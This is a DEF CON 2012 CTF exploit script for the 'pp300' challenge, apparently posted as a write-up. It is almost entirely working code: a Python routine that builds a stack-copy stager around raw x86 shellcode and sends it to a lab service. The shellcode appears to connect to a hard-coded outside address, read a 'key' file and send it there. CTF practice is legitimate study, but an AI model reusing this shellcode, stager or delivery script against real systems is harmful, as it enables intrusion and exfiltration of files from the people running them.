
defcon20 pp300 exploit

badcob 2012. 6. 16. 14:10
#!/usr/bin/python2.6
#defcon 2012, pp300 exploit - badcob

import socket, sys
from struct import pack 

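def make_connection(host, port):
    """Open a TCP connection to ``(host, port)`` and return the connected socket.

    If ``connect()`` fails (refused, unreachable, timed out) the freshly
    created socket is closed before the ``socket.error`` is re-raised, so a
    failed attempt no longer leaks a file descriptor.  The caller owns the
    returned socket and is responsible for closing it.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect((host, port))
    except socket.error:
        # Release the descriptor before propagating the error.
        s.close()
        raise
    return s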

def make_payload(scode):
    """Wrap *scode* in a byte-by-byte stack-copy stager.

    One ``\\x90`` is appended to *scode* first (the 79-byte shellcode in this
    file becomes 80 bytes).  Every byte is then emitted as one
    ``mov byte ptr ss:[ebp+disp8], imm8`` instruction (``c6 45 <disp8> <imm8>``)
    whose displacement is the byte's index, and the sequence ends with
    ``call ebp`` (``ff d5``) plus two trailing bytes kept from the original.
    ``chr(index)`` is used as the displacement with no range check, so this
    only makes sense for short shellcode such as the one in this file.
    Returns the stager as a str.
    """
    # Padding byte so the copied shellcode is an even 80 bytes.
    padded = scode + "\x90"

    # Opcode prefix of `mov byte ptr ss:[ebp+disp8], imm8`.
    store_prefix = "\xc6\x45"

    # One store per shellcode byte; the displacement is the byte's index.
    stores = [store_prefix + chr(index) + byte
              for index, byte in enumerate(padded)]

    # `call ebp` followed by the two trailing bytes used in the original.
    tail = "\xff\xd5\x90\xff"
    return "".join(stores) + tail
    
    
#shellcode
# Raw x86 shellcode that the stager built by make_payload() copies onto the
# stack and jumps to.  It is not decoded here; the repeated "\xcd\x80"
# bytes are `int 0x80` system calls.  Length: 79 bytes (make_payload
# appends one "\x90" to make it 80).
scode = (
    "\x83\xC4\x70\x6A\x61\x58\x99\x52\x6A\x01\x6A\x02\x50\xCD\x80\x96\x6A\x62\x58\x68\xD2\x00\x3C\xEB\x68\xAA\x02\x27\x0F"
    "\x89\xE3\x6A\x10\x53\x56\x50\xCD\x80\x6A\x05\x58\x52\x68\x2F\x6B\x65\x79\x68\x2E\x2F\x2F\x2F"
    "\x89\xE3\x52\x53\x50\xCD\x80\x97\x6A\x03\x58\x6A\x40\x53\x57\x50\xCD\x80\x50\x6A\x04\x58\x53\x56\x50\xCD\x80"
)

# Target service: a lab VM on a private (RFC 1918) network in this write-up.
host = "192.168.74.134"
port = 7548

# First line sent to the service: a 16-hex-digit token plus newline.
# NOTE(review): the page does not say where the token comes from; presumably
# a per-challenge value -- confirm against the service.
num = "3c56bc31268ac65f\x0a"

# Stager + shellcode, delivered as the second message.
payload = make_payload(scode)

# Token line first, then the payload.  socket.send() may write fewer bytes
# than requested and its return value is not checked here; the socket is
# also never closed explicitly.
s = make_connection(host, port)
s.send(num)
s.send(payload)